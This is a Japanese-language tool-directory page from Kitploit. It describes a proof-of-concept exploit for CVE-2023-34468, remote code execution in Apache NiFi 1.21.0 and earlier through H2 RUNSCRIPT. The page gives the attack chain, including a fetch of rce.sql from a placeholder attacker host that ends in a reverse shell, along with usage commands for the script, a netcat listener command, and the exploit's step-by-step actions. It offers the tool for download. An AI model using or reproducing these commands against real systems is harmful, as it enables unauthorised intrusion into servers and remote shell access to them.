Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/0xsoulaimane/cve-2023-34468-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツールペイロード開発
GitHub0xsoulaimane/cve-2023-34468-poc

CVE-2023-34468-POC

CVE-2023-34468 の PoC エクスプロイト — Apache NiFi <= 1.21.0 における H2 RUNSCRIPT を介した RCE

リポジトリを見る
44ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-34468 — Apache NiFi 1.21.0 RCE PoC

Apache NiFi <= 1.21.0 における H2 データベースの RUNSCRIPT を介したリモートコード実行


脆弱性

Apache NiFi には、デフォルトで H2 データベースの JAR が同梱されています。DBCPConnectionPool コントローラサービスは、この H2 ドライバを使用するように設定できます。H2 は、リモート URL から SQL ファイルを取得して実行する RUNSCRIPT ステートメントをサポートしています。この SQL ファイルは、 CREATE ALIAS を介して任意の Java コードを定義し、サーバーの OS 上で実行することができます。

攻撃チェーン:

root@kitploit:~
DBCPConnectionPool (H2 driver)
    → ExecuteSQL processor
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java method)
                → CALL SHELLEXEC (reverse shell)

影響を受けるバージョン

SoftwareVersion
Apache NiFi<= 1.21.0
Fixed in1.21.1+
JavaAny (bundled)

要件

  • Python 3.x
  • requests ライブラリ → pip install requests
  • 匿名書き込みアクセスまたは有効な認証情報を持つ NiFi ターゲット
  • ターゲットからあなたのマシンへのネットワークアクセス (リバースシェルコールバック用)

使用方法

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

引数

ArgumentDefaultDescription
--targethttp://NiFi.target.comターゲット NiFi のベース URL
--lhost10.10.10.10あなたの IP (tun0)
--lport4444リバースシェルリスナーポート
--http-port80rce.sql を配信するポート
--cleanupFalse実行後に作成されたアーティファクトを削除

セットアップ

ターミナル 1 — リスナー:

root@kitploit:~
nc -lvnp 4444

ターミナル 2 — エクスプロイト:

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

PoC の動作内容

root@kitploit:~
Step 1  Check anonymous access and write permissions
Step 2  Get root Process Group ID
Step 3  Create malicious DBCPConnectionPool controller service
Step 4  Enable the controller service (handles revision versioning)
Step 5  Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6  Start the processor → NiFi fetches rce.sql → shell callback
Step 7  Cleanup (if --cleanup flag is set)
ツールをダウンロード